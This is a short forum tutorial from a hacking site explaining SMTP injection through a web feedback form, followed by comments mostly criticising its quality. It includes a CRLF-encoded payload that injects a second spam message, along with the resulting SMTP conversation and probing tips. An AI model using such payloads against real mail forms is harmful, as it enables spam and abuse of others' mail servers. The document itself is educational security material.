Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

SMTP injection


SMTP injection

By ghostghost | 12850 Reads |
0     0

I haven't done anything in a while, and I didn't find this here, so I figured I'd write an article on it. Here you go.

There are cases where an application may preform the SMTP conversation itself, or may pass user supplied input to a different component in order to do this. In this situation, it may be possible to inject arbitrary SMTP commands directly into this conversation, potentially taking full control of the messages being generated by the application.

For example, consider an application that uses requests of the following form to submit site feedback:

Post feedback.php HTTP/1.1 Host site.com CONTENT-LENGTH: 56

From=me@mail.com&Subject=Site+feeback&message=hello

This causes the web application to preform an SMTP conversation with the following commands:

MAIL FROM: me@mail.com RCPT TO: feedback@site.com DATA From: me@mail.com To: feddback@site.com Subject: site feedback hello

NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message comprising of the message headers and body, and then sends a single dot character on its own line. This tells the server that the message is complete, and the client can then issue further SMTP commands to send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:

Post feedback.php HTTP/1.1 Host site.com CONTENT-LENGTH: 240

From=me@mail.com&Subject=Site+feeback%0d%0ahello%0d%0a%2e%0d%0aMail+FROM:+mail@viagra.com%0d%0aRSPT +TO:+john@mail.com%0d%0aDATA%0d%0aFROM:+person@mail.com%0d%0aTO+john@mail.com%0d%0aSubject:+Cheap+viagra%0d%0aBlah%0d%0a%2e%0d%0amessage=foo If the application is vulnerable, then this will result in the following SMTP conversation, which give two different email messages, with the second being entirely within you control:

MAIL FROM: me@mail.com RCPT TO: feedback@site.com DATA From: me@mail.com To: feddback@site.com Subject: site feedback hello . MAIL FROM: person@mail.com RCPT TO: john@mail.com DATA From: person@mail.com To: john@smail.com Subject: Cheap Viagra Blah . foo .

Finding SMTP injection flaws:

To probe an application's mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message.

You should also test for each kind of attack, and you should preform each test case using both windows and unix-style newline characters.

I hope you liked it, I'm working on more as we speak.

Comments
ghost's avatar
ghost 15 years ago

I didn't approve this article because: (1) The content is very light and lofty and, (2) I feel like I've seen it before. While you illustrate a single technique, you don't explain it well enough to even make this a single-focus article. I should've just disapproved this heap of shit when I had the chance.

ghost's avatar
ghost 15 years ago

The problem is that people care less, submit less, and ultimately pieces of shit like this seem to make it through the cracks. We need quality members, quality content, and at least halfway give-a-shit-itude. I'm just going to start disapproving anything that looks halfway questionable, since some people seem incapable of disapproving shit when they see it in the submissions.

korg's avatar
korg 15 years ago

Old, outdated and bullshit. Anyone running this is an ass! SMTP exploits have change my dear. Grammer and punctuation sucks bad. Sorry! -10/10

ghost's avatar
ghost 15 years ago

so this and the other article are crap and disclose obvious things where as "how not to annoy others" is very good and in no way discloses the obvious. it feels like there are some bias people here.

ghost's avatar
ghost 15 years ago

No, you're just hoping that there are biased people here so that you can defend your choice to write an article solely about one "trick" (email header injection using carriage returns and new lines). Since you chose to bring up that particular article, I'll bite… I approved it (for laughs) and commented on it stating that it couldn't possibly get an "Awesome". Now, why did it get the positive reviews that it did? The purpose of his article was a valid one and was expressed using: (1) Good grammar technique, (2) Good structure of thoughts and supporting details, and (3) Depth of concepts and logic. Take out the quote blocks in your article here and look at the amount of text you actually wrote. Read it and pay attention to the depth (or lack thereof). You gave the "how not to annoy others" article a Good rating… What would you give yours here?

ghost's avatar
ghost 15 years ago

i rated mine average because i see what you mean. i could have gone more in depth about it and perhaps broaden the scope of the article to other uses of this trick

richohealey's avatar
richohealey 15 years ago

Also explain that your % escapes rely totally on the http actually converting them to their ascii equivalents, some don't.

ghost's avatar
ghost 15 years ago

I can't understand why other "smart asses" acting like a jurkes.It's not the best but show some respect because S/He spent some time writing this.I also don't know English good (so what than),but know how to every bit working in my PC.Your replays are annoying… Writing for such a "nice" people is a wasting of time!

"You didn't even explain what %0d%0a is/does…"Let's open hellboundpedia… Good for exert…

ghost's avatar
ghost 15 years ago

<- Here you go sorry, bored)